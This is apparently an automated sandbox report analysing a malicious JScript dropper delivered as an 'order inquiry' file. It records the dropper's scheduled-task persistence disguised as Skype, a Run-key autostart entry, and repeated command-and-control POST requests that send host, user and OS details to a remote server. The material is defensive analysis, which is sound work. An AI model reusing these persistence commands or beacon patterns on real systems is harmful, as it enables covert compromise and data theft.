Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 14, 2021, 10:29 a.m.	Sept. 14, 2021, 10:31 a.m.

Size	17.5KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`9beeb0cd672264c6db9a47fc34e0fd7a`
SHA256	`c504a603ade3dee1caa6b200b65c06ffd9325c2e4cd31e28cd8dcc1ac4a0803b`
CRC32	`0A25051D`
ssdeep	`384:2YESpD76NQOzCJAtFMoQ4AA7ZanqS/OWhSbJ2zd6F:1XixZwq0g2zU`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Order_inquiry_012_013_21.js
180
- schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_012_013_21.js
  2792

Name	Response	Post-Analysis Lookup
grace2020.home-webserver.de	A 31.210.20.230	31.210.20.230

IP Address	Status	Action
164.124.101.2	Active	Moloch
31.210.20.230	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (50 out of 57 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 10:31 a.m.	computer_name: TEST22-PC	1	1

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Sept. 14, 2021, 10:29 a.m.	buffer: SUCCESS: The scheduled task "Skype" has successfully been created. console_handle: 0x00000007	1	1	0

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_012_013_21.js
cmdline	Schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_012_013_21.js

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Sept. 14, 2021, 10:29 a.m.	show_type: 0 filepath_r: Schtasks parameters: /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_012_013_21.js filepath: Schtasks	1	1	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_012_013_21.js
cmdline	Schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_012_013_21.js

Wscript.exe initiated network communications indicative of a script based payload download (22 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW Sept. 14, 2021, 10:29 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:29 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
InternetCrackUrlW Sept. 14, 2021, 10:29 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:29 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
InternetCrackUrlW Sept. 14, 2021, 10:29 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:29 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
InternetCrackUrlW Sept. 14, 2021, 10:29 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:29 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
InternetCrackUrlW Sept. 14, 2021, 10:30 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
InternetCrackUrlW Sept. 14, 2021, 10:30 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
InternetCrackUrlW Sept. 14, 2021, 10:30 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
InternetCrackUrlW Sept. 14, 2021, 10:30 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
InternetCrackUrlW Sept. 14, 2021, 10:30 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
InternetCrackUrlW Sept. 14, 2021, 10:31 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:31 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
InternetCrackUrlW Sept. 14, 2021, 10:31 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:31 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356

Installs itself for autorun at Windows startup (3 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\P7EKOWB6GH	reg_value	"C:\ProgramData\Order_inquiry_012_013_21.js"
cmdline	"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_012_013_21.js
cmdline	Schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_012_013_21.js

wscript.exe-based dropper (JScript, VBS) (11 events)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (50 out of 55 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW Sept. 14, 2021, 10:29 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:29 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Sept. 14, 2021, 10:29 a.m.	buffer: ! socket: 1068 sent: 1	1	1
send Sept. 14, 2021, 10:29 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1148 sent: 304	1	304
send Sept. 14, 2021, 10:29 a.m.	buffer: ! socket: 1068 sent: 1	1	1
InternetCrackUrlW Sept. 14, 2021, 10:29 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:29 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Sept. 14, 2021, 10:29 a.m.	buffer: ! socket: 1068 sent: 1	1	1
send Sept. 14, 2021, 10:29 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1248 sent: 304	1	304
send Sept. 14, 2021, 10:29 a.m.	buffer: ! socket: 1068 sent: 1	1	1
InternetCrackUrlW Sept. 14, 2021, 10:29 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:29 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Sept. 14, 2021, 10:29 a.m.	buffer: ! socket: 1068 sent: 1	1	1
send Sept. 14, 2021, 10:29 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1260 sent: 304	1	304
send Sept. 14, 2021, 10:29 a.m.	buffer: ! socket: 1068 sent: 1	1	1
InternetCrackUrlW Sept. 14, 2021, 10:29 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:29 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Sept. 14, 2021, 10:29 a.m.	buffer: ! socket: 1068 sent: 1	1	1
send Sept. 14, 2021, 10:29 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1252 sent: 304	1	304
send Sept. 14, 2021, 10:29 a.m.	buffer: ! socket: 1068 sent: 1	1	1
InternetCrackUrlW Sept. 14, 2021, 10:30 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Sept. 14, 2021, 10:30 a.m.	buffer: ! socket: 1068 sent: 1	1	1
send Sept. 14, 2021, 10:30 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1276 sent: 304	1	304
send Sept. 14, 2021, 10:30 a.m.	buffer: ! socket: 1068 sent: 1	1	1
InternetCrackUrlW Sept. 14, 2021, 10:30 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Sept. 14, 2021, 10:30 a.m.	buffer: ! socket: 1068 sent: 1	1	1
send Sept. 14, 2021, 10:30 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 416 sent: 304	1	304
send Sept. 14, 2021, 10:30 a.m.	buffer: ! socket: 1068 sent: 1	1	1
InternetCrackUrlW Sept. 14, 2021, 10:30 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Sept. 14, 2021, 10:30 a.m.	buffer: ! socket: 1068 sent: 1	1	1
send Sept. 14, 2021, 10:30 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1128 sent: 304	1	304
send Sept. 14, 2021, 10:30 a.m.	buffer: ! socket: 1068 sent: 1	1	1
InternetCrackUrlW Sept. 14, 2021, 10:30 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Sept. 14, 2021, 10:30 a.m.	buffer: ! socket: 1068 sent: 1	1	1
send Sept. 14, 2021, 10:30 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1148 sent: 304	1	304
send Sept. 14, 2021, 10:30 a.m.	buffer: ! socket: 1068 sent: 1	1	1
InternetCrackUrlW Sept. 14, 2021, 10:30 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Sept. 14, 2021, 10:30 a.m.	buffer: ! socket: 1068 sent: 1	1	1
send Sept. 14, 2021, 10:30 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 416 sent: 304	1	304
send Sept. 14, 2021, 10:30 a.m.	buffer: ! socket: 1068 sent: 1	1	1
InternetCrackUrlW Sept. 14, 2021, 10:31 a.m.	url: http://grace2020.home-webserver.de:3774/Vre flags: 0	1	1
HttpOpenRequestW Sept. 14, 2021, 10:31 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Sept. 14, 2021, 10:31 a.m.	buffer: ! socket: 1068 sent: 1	1	1
send Sept. 14, 2021, 10:31 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1272 sent: 304	1	304
send Sept. 14, 2021, 10:31 a.m.	buffer: ! socket: 1068 sent: 1	1	1

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_012_013_21.js
parent_process	wscript.exe				martian_process	Schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_012_013_21.js

Generates some ICMP traffic

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\schtasks.exe

Order_inquiry_012_013_21.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All